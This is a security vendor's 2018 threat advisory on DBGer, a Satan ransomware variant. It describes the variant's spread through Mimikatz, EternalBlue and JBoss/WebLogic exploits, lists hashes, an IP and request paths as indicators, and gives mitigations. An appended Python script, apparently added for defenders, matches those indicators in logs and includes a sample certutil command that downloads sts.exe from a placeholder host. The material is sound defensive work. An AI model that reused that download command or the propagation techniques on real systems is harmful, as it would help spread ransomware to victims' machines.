Rewterz Threat Advisory – New Variant of Satan Ransomware

July 5, 2018

This advisory covers DBGer ransomware, a new variant of Satan ransomware, which compromises and encrypts the victim's host and demands a bitcoin payment.

IMPACT: NORMAL

PUBLISH DATE: 05-07-2018

OVERVIEW

A new variant of Satan ransomware has been identified as DBGer. It drops Mimikatz to dump credentials for networked computers, then uses the obtained credentials to access and infect those devices. The malware also drops several EternalBlue files on the victim's host; EternalBlue is used to scan the local network for computers running outdated SMB services and to infect them.

The Satan ransomware also uses other exploits to propagate through networks. The DBGer exploits include:

  • JBoss CVE-2017-12149
  • Weblogic CVE-2017-10271
  • EternalBlue exploit CVE-2017-0143
  • Tomcat web application brute forcing

BACKGROUND INFORMATION:

Satan ransomware was first discovered by security researchers in January 2017 as Ransomware-as-a-Service (RaaS). It has now been rebranded as DBGer ransomware, as discovered by MalwareHunter, and its modus operandi has also changed: the new variant uses the EternalBlue exploit and incorporates Mimikatz, an open-source password-dumping utility.

Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments. This is the same exploit associated with a previous WannaCry Ransomware campaign. In March 2017, Microsoft patched the vulnerability associated with EternalBlue. However, many environments still remain vulnerable to it.

In a ransomware attack, the attacker encrypts the data on the compromised device and then demands a bitcoin payment as ransom. If the attacked organization does not pay, the attacker may destroy the data on the compromised device, or the data may simply remain encrypted and inaccessible to the user.

WORK ANALYSIS

The sample of the variant observed by MalwareHunter was packed with the MPRESS packer as shown below.

Sts.exe initiates the spread across the network by scanning all systems within the same network segment. Through the following command line, systems vulnerable to the SMB EternalBlue exploit are made to execute the previously dropped library down64.dll.

The down64.dll attempts to load code in the target's memory and then downloads sts.exe using the legitimate Microsoft certutil.exe tool. This is a known download technique, described as Remote File Copy (T1105) in MITRE ATT&CK. After infecting other systems in the same network, the sample finally drops Satan ransomware to C:\Satan.exe. This executable is packed with MPRESS, like the original sample.

Executing Satan.exe starts the ransomware attack, which first stops the following processes:

The ransomware then encrypts the data on the compromised device. After encryption, Satan.exe creates a note at C:\_How_to_decrypt_files.txt with instructions, and then launches notepad to open the note.

The note contains the instructions to decrypt the system and a contact email address: satan_pro@mail[.]ru, requesting a Bitcoin payment as seen below in a sample of the note:

THREAT INDICATORS

File-Hashes

  • 3e3f8570c11dff0b5a0e061eae6bdd66cf9fa01d815658a0589d98873500358d
  • 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13
  • b556b5c077e38dcb65d21a707c19618d02e0a65ff3f9887323728ec078660cc3
  • 15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
  • 0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
  • 93027b47ef0b6f7d933017320951bbbeef792a8f1bc43b3fe96c2b61f1dc2636
  • cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
  • 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
  • ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
  • db0831e19a4e3a736ea7498dadc2d6702342f75fd8f7fbae1894ee2e9738c2b4
  • aa8adf96fc5a7e249a6a487faaf0ed3e00c40259fdae11d4caf47a24a9d3aaed
  • be8eb97d8171b8c91c6bc420346f7a6d2d2f76809a667ade03c990feffadaad5
  • 0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
  • 50f329e034db96ba254328cd1e0f588af6126c341ed92ddf4aeb96bc76835937
  • aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
  • cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
  • b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68
  • b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
  • f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
  • 5f30aa2fe338191b972705412b8043b0a134cdb287d754771fc225f2309e82ee
  • cf12eca0e10dc3370d7917e7678dc09629240d3e7cc71c5ac0df68576bea0682

IP Addresses

45.124.132.119

URI paths

/invoker/readonly

/orders.xhtml

/Clist1.jsp

/manager/html

/wls-wsat/CoordinatorPortType

RESOLVE

  • Update to the latest software version for your applications, especially those affected by CVE-2017-12149, CVE-2017-10271, and CVE-2017-0143.
  • Ensure your organization is running an actively supported operating system that receives security updates.
  • Have effective patch management that deploys security updates to endpoints and other critical parts of your infrastructure in a timely manner.
  • Run anti-malware software on your system and ensure you regularly receive malware signature updates.
  • Do not click on suspicious pop-ups or download files from suspicious websites.
  • Ensure anti-virus software is updated with the latest signatures.
  • Monitor or block the indicators included in this report.
  • Implement a disaster recovery plan that includes backing up and restoring data from devices that are kept offline. Adversaries frequently target backup mechanisms to limit the possibilities a user may be able to restore their files without paying the ransom.
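As an added defender-side example (not tooling from the advisory or from Rewterz), the script below applies the indicators from the THREAT INDICATORS section and the host artifacts named in the WORK ANALYSIS section (sts.exe, down64.dll, Satan.exe, the ransom note, and certutil.exe fetching a URL as in T1105) to web-server access log lines and process-creation events. The hash set is a subset of the advisory's list; the sample log lines, the example.invalid hostname and the certutil command-line shape are constructed assumptions for the example, not observed data.

```python
"""Match DBGer/Satan indicators from the advisory against sample telemetry.

Added example, not the advisory's own tooling. Indicator values come from
the advisory; every log line below is constructed for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Subset of the SHA-256 file hashes listed under THREAT INDICATORS.
KNOWN_HASHES = {
    "3e3f8570c11dff0b5a0e061eae6bdd66cf9fa01d815658a0589d98873500358d",
    "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13",
    "cf12eca0e10dc3370d7917e7678dc09629240d3e7cc71c5ac0df68576bea0682",
}
KNOWN_IPS = {"45.124.132.119"}
# Request paths the advisory lists (JBoss, WebLogic and Tomcat propagation).
KNOWN_PATHS = {
    "/invoker/readonly", "/orders.xhtml", "/Clist1.jsp",
    "/manager/html", "/wls-wsat/CoordinatorPortType",
}
# Host artifacts named in the WORK ANALYSIS section (compared lower-cased).
KNOWN_FILENAMES = {"sts.exe", "down64.dll", "satan.exe", "_how_to_decrypt_files.txt"}


@dataclass(frozen=True)
class Finding:
    source: str     # "web" or "process"
    indicator: str  # which indicator value matched
    detail: str     # the log fragment that triggered the match


# Combined access-log format: ip ident user [time] "METHOD path PROTO" status size
WEB_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def check_web_line(line: str) -> list[Finding]:
    """Flag requests from the listed IP or for the listed propagation paths."""
    m = WEB_RE.match(line)
    if not m:
        return []  # unparseable line: nothing to match, never an exception
    findings = []
    if m["ip"] in KNOWN_IPS:
        findings.append(Finding("web", m["ip"], line.strip()))
    path = m["path"].split("?", 1)[0]  # compare without the query string
    if path in KNOWN_PATHS:
        findings.append(Finding("web", path, line.strip()))
    return findings


def check_process_event(image: str, cmdline: str) -> list[Finding]:
    """Flag certutil.exe fetching a URL (T1105 pattern assumed here) and the
    dropped file names from the analysis appearing in a process event."""
    findings = []
    image_name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    low = cmdline.lower()
    if image_name == "certutil.exe" and "http" in low:
        findings.append(Finding("process", "certutil download", cmdline))
    for name in KNOWN_FILENAMES:
        if name in low or image_name == name:
            findings.append(Finding("process", name, cmdline))
    return findings


def check_file_hash(sha256_hex: str) -> bool:
    """True if the digest is one of the advisory's listed file hashes."""
    return sha256_hex.strip().lower() in KNOWN_HASHES


# Constructed sample telemetry (not from the advisory).
SAMPLE_WEB_LOG = [
    '10.0.0.5 - - [05/Jul/2018:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '45.124.132.119 - - [05/Jul/2018:10:01:09 +0000] "POST /invoker/readonly HTTP/1.1" 500 231',
    '10.0.0.9 - - [05/Jul/2018:10:02:33 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 44',
    '10.0.0.9 - - [05/Jul/2018:10:02:40 +0000] "GET /manager/html?x=1 HTTP/1.1" 401 0',
]
SAMPLE_PROCESSES = [  # (image path, command line); certutil shape is assumed
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -f http://example.invalid/sts.exe C:\\sts.exe"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe C:\\_How_to_decrypt_files.txt"),
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]


def hunt(web_lines: list[str], processes: list[tuple[str, str]]) -> list[Finding]:
    """Run every check over the supplied telemetry and collect the findings."""
    findings: list[Finding] = []
    for line in web_lines:
        findings.extend(check_web_line(line))
    for image, cmd in processes:
        findings.extend(check_process_event(image, cmd))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_WEB_LOG, SAMPLE_PROCESSES):
        print(f"[{f.source}] {f.indicator}: {f.detail}")
```

The path check deliberately strips the query string and compares exact paths, so a legitimate request for a different resource under /manager is not flagged; the certutil rule keys on the image name plus a URL in the command line rather than on specific switches, because the advisory names the tool but not the exact invocation.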

If you think you are a victim of a cyber-security attack, immediately send an email to info@rewterz.com for a rapid response.
